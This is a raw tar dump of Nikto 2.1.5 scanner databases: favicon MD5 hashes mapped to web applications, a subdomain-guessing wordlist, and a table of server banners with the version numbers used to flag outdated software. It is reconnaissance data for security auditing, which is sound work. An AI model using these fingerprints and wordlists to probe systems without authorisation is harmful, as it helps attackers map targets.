"500020","d41d8cd98f00b204e9800998ecf8427e","Apache HTTP Server on Apple Mac OS X Server" "500021","f097f0adf2b9e95a972d21e5e5ab746d","Citrix Access Server" "500022","69ae01d0c74570d4d221e6c24a06d73b","Roku Soundbridge" "500023","2e9545474ee33884b5fb8a9a0b8806dd","Ampache" "500024","d80e364c0d3138c7ecd75bf9896f2cad","Alfresco Enterprise Content Management System" "500025","639b61409215d770a99667b446c80ea1","Lotus Domino" "500026","be6fb62815509bd707e69ee8dad874a1","i.LON server by Echelon" "500028","a46bc7fc42979e9b343335bdd86d1c3e","NetScout NGenius" "500029","192decdad41179599a776494efc3e720","JBoss Installation" "500030","de2b6edbf7930f5dd0ffe0528b2bbcf4","Barracuda Spam/Virus firewall appliance" "500031","386211e5c0b7d92efabd41390e0fc250","SparkWeb web-based collaboration client. http://www.igniterealtime.org/" "500032","f89abd3f358cb964d6b753a5a9da49cf","LimeSurvey" "500033","a7947b1675701f2247921cf4c2b99a78","Alexander Palmo Simple PHP Blog" "500034","01febf7c2bd75cd15dae3aa093d80552","Atlassian Pty Crucible or Fisheye" "500035","04d89d5b7a290334f5ce37c7e8b6a349","Atlassian Pty Jira" "500036","1275afc920a53a9679d2d0e8a5c74054","Atlassian Pty Crowd" "500037","12888a39a499eb041ca42bf456aca285","Atlassian Pty Confluence or Crowd" "500038","3341c6d3c67ccdaeb7289180c741a965","Atlassian Pty Confluence or Crowd" "500039","43ba066789e749f9ef591dc086f3cd14","Atlassian Pty Bamboo" "500040","6c1452e18a09070c0b3ed85ce7cb3917","Atlassian Pty Jira" "500041","a83dfece1c0e9e3469588f418e1e4942","Atlassian Pty Bamboo" "500043","e6a9dc66179d8c9f34288b16a02f987e","Drupal 5.1.0" "500044","f0ee98b4394dfdab17c16245dd799204","Drupal" "500045","7b0d4bc0ca1659d54469e5013a08d240","Netgear (Infrant) ReadyNAS NV+" "500047","39308a30527336e59d1d166d48c7742c","Hewlett-Packard HPLIP 2.8.7 (doc)" "500048","cee40c0b35bded5e11545be22a40e363","OSSDL.de Openmailadmin " "500049","4f88ba9f1298701251180e6b6467d43e","Xinit Systems Ltd. Openfiler" "500050","4c3373870496151fd02a6f1185b0bb68","rPath Appliance Agent" "500051","b231ad66a2a9b0eb06f72c4c88973039","Wordpress" "500052","e1e8bdc3ce87340ab6ebe467519cf245","Wordpress" "500053","64ca706a50715e421b6c2fa0b32ed7ec","Parallels Plesk Control Panel" "500054","c1201c47c81081c7f0930503cae7f71a","vBulletin" "500055","31c16dd034e6985b4ba929e251200580","Stephen Turner Analog 6.0" "500056","4eb846f1286ab4e7a399c851d7d84cca","Plone Foundation Plone 3.1.1" "500057","95103d0eabcd541527a86f23b636e794","Wordpress Multi-User (MU)" "500058","e08333841cbe40d15b18f49045f26614","21publish blog 21publish.com" "500059","e2cac3fad9fa3388f639546f3ba09bc0","Invision Power Services IP.Board" "500060","740af61c776a3cb98da3715bdf9d3fc1","vBulletin" "500061","5ec8d0ecf7b505bb04ab3ac81535e062","Telligent Community Server" "500062","a47951fb41640e7a2f5862c296e6f218","Plone" "500063","83a1fd57a1e1684fafd6d2487290fdf5","Pligg LLC Pligg" "500064","a6b55b93bc01a6df076483b69039ba9c","Fog Creek FogBugz" "500065","e551b7017a9bd490fc5b76e833d689bf","MoinMoin 1.7.1" "500066","63b982eddd64d44233baa25066db6bc1","Joomla" "500067","05bc6d56d8df6d668cf7e9e11319f4e6","Jive Forums" "500068","d7ac014e83b5c4a2dea76c50eaeda662","vBulletin" "500069","63740175dae089e479a70c5e6591946c","The Lyceum Project" "500070","10bd6ad7b318df92d9e9bd03104d9b80","Plone" "500071","4cbb2cfc30a089b29cd06179f9cc82ff","Dragonfly" "500072","389a8816c5b87685de7d8d5fec96c85b","XOOPS" "500073","8757fcbdbd83b0808955f6735078a287","Comsenz Technology Ltd Discuz!" "500074","f425342764f8c356479d05daa7013c2f","vBulletin" "500075","a1c686eb6e771878cf6040574a175933","CivicPlus" "500076","4d7fe200d85000aea4d193a10e550d04","Intland Software codeBeamer" "500077","3995c585b76bd5aa67cb6385431d378a","Horde Project 0.1+cvs20080316 - silver" "500078","1a9a1ec2b8817a2f951c9f1793c9bc54","Bitweaver" "500079","b7f98dd27febe36b7275f22ad73c5e84","MoinMoin" "500080","1cc16c64d0e471607677b036b3f06b6e","Roller Weblogger Project" "500081","7563f8c3ebd4fd4925f61df7d5ed8129","Holger Zimmerman Pi3Web HTTP Server" "500082","7f0f918a78ca8d4d5ff21ea84f2bac68","SubText" "500083","86e3bf076a018a23c12354e512af3b9c","Spyce" "500084","c0533ae5d0ed638ba3fb3485d8250a28","CakePHP 1.1.x" "500085","9c003f40e63df95a2b844c6b61448310","DD-WRT" "500086","9a9ee243bc8d08dac4448a5177882ea9","Dvbbs Forum" "500087","ee1169dee71a0a53c91f5065295004b7","ProjectPier" "500088","7214637a176079a335d7ac529011f4e4","phpress" "500089","1bf954ba2d568ec9771d35c94a6eb2dc","WoltLab Burning Board" "500090","ff3b533b061cee7cfbca693cc362c34a","Kayako SupportSuite" "500091","9187f6607b402df8bbc2aeb69a07bbca","XOOPS XOOPS" "500092","428b23df874b41d904bbae29057bdba5","Comsenz Technology Ltd ECShop" "500093","9fac8b45400f794e0799d0d5458c092b","Comsenz Technology Ltd Discuz!" "500094","4e370f295b96eef85449c357aad90328","Comsenz Technology Ltd SupeSite" "500095","4cfbb29d0d83685ba99323bc0d4d3513","PHPWind PHPWind Forums 7" "500096","de68f0ad7b37001b8241bce3887593c7","b2evolution b2evolution 2.4.2" "500097","73778a17b0d22ffbb7d6c445a7947b92","Apache HTTP Server on Apple Mac OS X Server" "500098","28893699241094742c3c2d4196cd1acb","Xerox DocuShare" "500099","80656aabfafe0f3559f71bb0524c4bb3","Macromedia Breeze" "500100","f6e9339e652b8655d4e26f3e947cf212","eGroupWare 1.0.0.009" "500101","48c02490ba335a159b99343b00decd87","Octeth Technologies oemPro 3.5.5.1" "500102","933a83c6e9e47bd1e38424f3789d121d","Moodle 1.9.x (multiple default themes)" "500103","b6652d5d71f6f04a88a8443a8821510f","Moodle 1.9.x (Cornflower theme)" "500104","eb6d4ce00ec36af7d439ebd4e5a395d7","Mailman" "500105","e298e00b2ff6340343ddf2fc6212010b","Nessus 4.x Web Client" "500106","ebe293e1746858d2548bca99c43e4969","Mantis Bug Tracker" "500107","0f45c2c79ebe90d6491ddb111e810a56","CherryPy 3.2.0" # at /platform/images/favicon.ico, see ticket 238 "500108","c0dc2e457e05c2ce0a99886ec1048d77","Platform Computing Corporation Platform Management Console Version v2.0" "500109","92d0841188d40b6fef294cf53a8addd7","cPanel cpsrvd webmail server" nikto-2.1.5/databases/db_subdomains0000644000000000000000000001341412023321514016020 0ustar rootroot#VERSION,2.006 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # NiktoDB 1.0 ####################################################################### "nikto_id","subdomain" "750000","adm" "750001","admin" "750002","admins" "750003","agent" "750004","aix" "750005","alerts" "750006","av" "750007","antivirus" "750008","app" "750009","apps" "750010","appserver" "750011","archive" "750012","as400" "750013","auto" "750014","backup" "750015","banking" "750016","bbdd" "750017","bbs" "750018","bea" "750019","beta" "750020","blog" "750021","catalog" "750022","cgi" "750023","channel" "750024","channels" "750025","chat" "750026","cisco" "750027","client" "750028","clients" "750029","club" "750030","cluster" "750031","clusters" "750032","code" "750033","commerce" "750034","community" "750035","compaq" "750036","console" "750037","consumer" "750038","contact" "750039","contracts" "750040","corporate" "750041","ceo" "750042","cso" "750043","cust" "750044","customer" "750045","data" "750046","bd" "750047","db2" "750048","default" "750049","demo" "750050","design" "750051","desktop" "750052","dev" "750053","develop" "750054","developer" "750055","device" "750056","dial" "750057","digital" "750058","dir" "750059","directory" "750060","disc" "750061","discovery" "750062","disk" "750063","dns" "750064","dns1" "750065","dns2" "750066","dns3" "750067","docs" "750068","documents" "750069","domain" "750070","domains" "750071","dominoweb" "750072","download" "750073","downloads" "750074","ecommerce" "750075","e-commerce" "750076","edi" "750077","edu" "750078","education" "750079","email" "750080","enable" "750081","engine" "750082","engineer" "750083","enterprise" "750084","event" "750085","events" "750086","example" "750087","exchange" "750088","extern" "750089","external" "750090","extranet" "750091","fax" "750092","field" "750093","finance" "750094","firewall" "750095","forum" "750096","forums" "750097","fsp" "750098","ftp" "750099","ftp2" "750100","fw" "750101","fw1" "750102","gallery" "750103","galleries" "750104","games" "750105","gateway" "750106","gopher" "750107","guest" "750108","gw" "750109","hello" "750110","helloworld" "750111","help" "750112","helpdesk" "750113","helponline" "750114","hp" "750115","ibm" "750116","ibmdb" "750117","ids" "750118","ILMI" "750119","images" "750120","imap" "750121","imap4" "750122","img" "750123","imgs" "750124","info" "750125","intern" "750126","internal" "750127","intranet" "750128","invalid" "750129","iphone" "750130","ipsec" "750131","irc" "750132","ircserver" "750133","jobs" "750134","ldap" "750135","link" "750136","linux" "750137","lists" "750138","listserver" "750139","local" "750140","localhost" "750141","log" "750142","logs" "750143","login" "750144","lotus" "750145","mail" "750146","mailboxes" "750147","mailhost" "750148","management" "750149","manage" "750150","manager" "750151","map" "750152","maps" "750153","marketing" "750154","device" "750155","media" "750156","member" "750157","members" "750158","messenger" "750159","mngt" "750160","mobile" "750161","monitor" "750162","multimedia" "750163","music" "750164","names" "750165","net" "750166","netdata" "750167","netstats" "750168","network" "750169","news" "750170","nms" "750171","nntp" "750172","ns" "750173","ns1" "750174","ns2" "750175","ns3" "750176","ntp" "750177","online" "750178","openview" "750179","oracle" "750180","outlook" "750181","page" "750182","pages" "750183","partner" "750184","partners" "750185","pda" "750186","personal" "750187","ph" "750188","pictures" "750189","pix" "750190","pop" "750191","pop3" "750192","portal" "750193","press" "750194","print" "750195","printer" "750196","private" "750197","project" "750198","projects" "750199","proxy" "750200","public" "750201","ra" "750202","radio" "750203","raptor" "750204","ras" "750205","read" "750206","register" "750207","remote" "750208","report" "750209","reports" "750210","root" "750211","router" "750212","rwhois" "750213","sac" "750214","schedules" "750215","scotty" "750216","search" "750217","secret" "750218","secure" "750219","security" "750220","seri" "750221","serv" "750222","serv2" "750223","server" "750224","service" "750225","services" "750226","shop" "750227","shopping" "750228","site" "750229","sms" "750230","smtp" "750231","smtphost" "750232","snmp" "750233","snmpd" "750234","snort" "750235","solaris" "750236","solutions" "750237","support" "750238","source" "750239","sql" "750240","ssl" "750241","stats" "750242","store" "750243","stream" "750244","streaming" "750245","sun" "750246","support" "750247","switch" "750248","sysback" "750249","system" "750250","tech" "750251","terminal" "750252","test" "750253","testing" "750254","testing123" "750255","time" "750256","tivoli" "750257","training" "750258","transfers" "750259","uddi" "750260","update" "750261","upload" "750262","uploads" "750263","video" "750264","vpn" "750265","w1" "750266","w2" "750267","w3" "750268","wais" "750269","wap" "750270","web" "750271","webdocs" "750272","weblib" "750273","weblogic" "750274","webmail" "750275","webserver" "750276","webservices" "750277","websphere" "750278","whois" "750279","wireless" "750280","work" "750281","world" "750282","write" "750283","ws" "750284","ws1" "750285","ws2" "750286","ws3" "750287","www1" "750288","www2" "750289","www3" "750290","error" "750291","cpanel" "750292","my" "750293","recruit" "750294","recruits" nikto-2.1.5/databases/db_outdated0000644000000000000000000040204712023321514015471 0ustar rootroot#VERSION,2.017 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2008 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # NiktoDB 1.0 ####################################################################### "nikto_id","server","version","message" "600000","\(www\.ebdesk\.com\)/","1.3.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600001","0W/","0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600002","3Com/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600003","3Com/v","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600004","4D_WebStar_D/","7.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600005","4D_WebSTAR_S/","5.4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600006","4n4l0g4l1f3/","31337","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600007","a-p-a-c-h-e/","1-3-26","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600008","ABWS/","537","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600009","Abyss/","2.7.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600010","AbyssLib/","2.7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600011","Academy/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600012","accela/","1.92","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600013","Accipiter-DirectServer/","6.0.0.36","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600014","ACI-4D/","6.57","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600015","Acme\.Serve/","v1.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600016","ActiveAgent/","3.51","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600017","ActiveLinks/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600018","ActuateHttpService/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600019","Adaptec ASM ","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600020","ADSM_HTTP/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600021","AdSubtract","2.54","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600022","adtag/","1.0a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600023","Adtran Embedded HTTP Server ","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600024","aEGiS_nanoweb/","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600025","AG/","1.3.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600026","AGAVA.Banners/","1.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600027","Agent-ListenServer-HttpSvr/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600028","Agranat-EmWeb/","R5_2_6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600029","Agranat/","Agranat-EmWeb/R5_2_6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600030","Alchemy Eye/","Alchemy Eye/3.0.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600031","AlkalineSearchEngine/","1.","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600032","Allegro-Software-RomPager/","4.61","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600033","AllegroServe/","1.2.24","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600034","AMOS-HTTPD/","1.5A127","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600035","AMOS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600036","Analogx","1.0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600037","Anonymous/","1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600038","anses/","1.16","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600039","AnWeb/","1.42p","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600040","AOLserver/ ","4.5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600041","Apache Coyote/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600042","Apache Tomcat/","Apache Tomcat/4.1.36","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600043","Apache-ADTI/","1.3.28","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600044","Apache-AdvancedExtranetServer/","2.0.53","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600045","Apache-Coyote/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600046","Apache-NeoNova/","1.3.27","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600047","Apache-NeoWebScript/","2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600048","Apache-SSL-US/","1.1.1+1.2+1.3b3-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600049","Apache-SSL/","1.36","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600050","Apache/","Apache/2.2.22","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Apache 1.3.42 (final release) and 2.0.64 are also current." "600051","apachejserv/","1.1.2i","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600052","ApacheSSL/","2.0.58","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600053","AppleEmbeddedWebServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600054","AppleShareIP/","6.3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600055","ARIN-HTTPd/","1.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600056","ARM/","06TD.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600057","ArtBlast/","3.5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600058","ASP/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600059","AtermWARPSTAR/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600060","auth_external/","2.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600061","auth_kerberos/","4.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600062","auth_ldap/","1.6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600063","auth_mysql/","1.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600064","auth_radius/","1.7PR1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600065","AuthentiCache/","2.0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600066","AuthMySQL/","4.3.9-2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600067","AuthMySQL/","deam.org-1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600068","AuthMySQL/","trans-1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600069","AuthMySQLD/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600070","AuthNuSphere/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600071","AuthPG/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600072","AuthPostgreSQL/","0.9.7d","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600073","AuthSMB/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600074","AuthTDS/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600075","AV/","1.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600076","Awhttpd/","Awhttpd/2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600077","AWS/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600078","AXISThinWizard/","v3.05.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600079","AxKit/","1.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600080","balanced_by_mod_backhand/","1.1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600081","BaseHTTP/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600082","BBC ","06.21.501","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600083","BBCE/","6.6.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600084","BeatBoxCapture/","6.5.64","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600085","Ben-SSL/","1.60","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600086","beta/","0.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600087","BigFix HTTP Server/","5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600088","BillGatesSeinWebServer/","6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600089","BiRD/","0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600090","bkhttp/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600091","Blazix/","1.2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600092","Bluestem/","0.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600093","Boa/","0.94.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600094","BOA/","1.2.2c","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600095","bozohttpd/","20060517","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600096","broker/","8.7.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600097","BRS-WebWeaver/","1.33","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600098","BSAFE-SSL-C/","1.0.0i","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600099","BSDI/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600100","BunnyServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600101","buser/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600102","BustaWS/","3.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600103","bw/","3.37","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600104","BWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600105","C2NetEU/","3012","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600106","C2NetUS/","2011","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600107","Canon Http Server ","2.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600108","Caudium/","1.4.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600109","CCO/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600110","CERN/","3.0A","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600111","CheckPointSVNfoundation/","NGFP2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600112","Cheetah/","2.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600113","Cherry/","6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600114","CherryPy/","3.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600115","Chili!Soft-ASP/","3.6.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600116","cisco-CPA/","cisco-CPA/3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600117","cisco-IOS/","12.0 HTTP-server/1.0(1)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600118","CiteHTTPD/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600119","Citysearch-Apache/","1.3.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600120","CL-HTTP","70.190","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600121","CM4all-JailCGI/","1.4.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600122","CMS_Pipelines/","1.0110","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600123","CMS/","20.000","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600124","CoffeeMaker/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600125","Commerce-Builder/","2.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600126","CommerceServer400/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600127","CommuniGatePro/","5.4.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600128","Communique/","4.0.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600129","CommuniqueServletEngine/","4.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600130","CompaqHTTPServer/","9.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600131","ConcentricHost-Ashurbanipal/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600132","ConcentricHost-NaramSin/","1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600133","ConductorSNMP/","1.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600134","ConferenceRoom/","3.5.0.2-SEC.win32-ws2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600135","confproxy/","3.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600136","CoolWeb/","3.8.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600137","Core/","2.6.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600138","Cougar ","9.01.01.5001","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600139","covalent_auth/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600140","CovalentSSL/","2.1.03.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600141","Coyote/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600142","cpaneld/","cpaneld/6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600143","cpsrvd/","11.32.3.21","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600144","Crossing/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600145","Cryptoveg/","4.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600146","CSacek/","2.1.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600147","Cthulhu/","0.23a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600148","CUPS/","1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600149","da\.ru/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600150","DartWebServerTool/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600151","DAV/","2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600152","David-WebBox/","11.00a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600153","Debut/","1.08","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600154","DeleGate/","8.5.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600155","DeltaEdgeCache/","release-2-28-rc2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600156","DHost/","9.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600157","diffprivs/","20030624","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600158","Dina HTTPd Server/","1.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600159","DinaHTTPdServer/","1.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600160","Dixienet/","6.6.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600161","DLXApache/","4.3.29","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600162","DMMWeb/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600163","Domestic/","v2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600164","Domino-Go-Webserver/","4.6.2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600165","DotTV Webserver ","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600166","DSS/","5.5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600167","dwhttpd/","dwhttpd/4.2a7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600168","dynamicScale/","2.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600169","E-Neverland Data Palm/","1.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600170","e/FSV-","28-01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600171","eBD/","3.2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600172","ebLogic XMLX Module ","8.1 SP1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600173","EHTTP/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600174","EIMWebServer/","3.35","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600175","Embedded HTTP Server","2.0f","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600176","Embperl/","2.3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600177","EMWHTTPD/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" 